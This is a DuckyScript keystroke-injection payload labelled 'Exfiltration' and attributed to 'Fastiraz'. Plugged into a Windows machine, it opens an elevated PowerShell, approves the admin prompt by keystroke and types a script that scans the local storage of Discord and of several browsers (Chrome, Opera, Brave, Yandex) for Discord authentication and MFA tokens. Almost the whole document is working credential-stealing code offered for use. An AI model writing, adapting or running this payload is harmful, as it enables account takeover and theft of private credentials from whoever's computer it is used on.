REM Author: Fastiraz
REM Description: Extracts Discord tokens with a payload of 978 characters.
REM Version:	1.0
REM Category:	Exfiltration
DELAY 750
WINDOWS d
DELAY 1500
WINDOWS r
DELAY 1500
STRING powershell
CTRL SHIFT ENTER
DELAY 750
LEFTARROW
DELAY 1100
ENTER
DELAY 1200
ALT y
DELAY 1300
GUI UP
DELAY 1400
STRING function Find-Tokens{param([string]$p)$t=@();$p+='\Local Storage\leveldb';Get-ChildItem $p|ForEach-Object{$f=$_.Name;if($f -notmatch '\.log$|\.ldb$'){return}$t+=Select-String -Path "$p\$f" -Pattern '([\w-]{24}\.[\w-]{6}\.[\w-]{27}|mfa\.[\w-]{84})' -AllMatches|ForEach-Object{$_.Matches.Value}};return $t}$l=[System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::LocalApplicationData);$r=[System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::ApplicationData);$p=@{'Discord'="$r\Discord";'Discord Canary'="$r\discordcanary";'Discord PTB'="$r\discordptb";'Google Chrome'="$l\Google\Chrome\User Data\Default";'Opera'="$r\Opera Software\Opera Stable";'Brave'="$l\BraveSoftware\Brave-Browser\User Data\Default";'Yandex'="$l\Yandex\YandexBrowser\User Data\Default"};$m="";foreach($pl in $p.Keys){$pa=$p[$pl];if(-not(Test-Path $pa)){continue};$m+="`n**$pl**`n";$t=Find-Tokens -p $pa;if($t.Count -gt 0){$m+=$t -join "`n"}else{$m+='No tokens found.'}}$m
ENTER
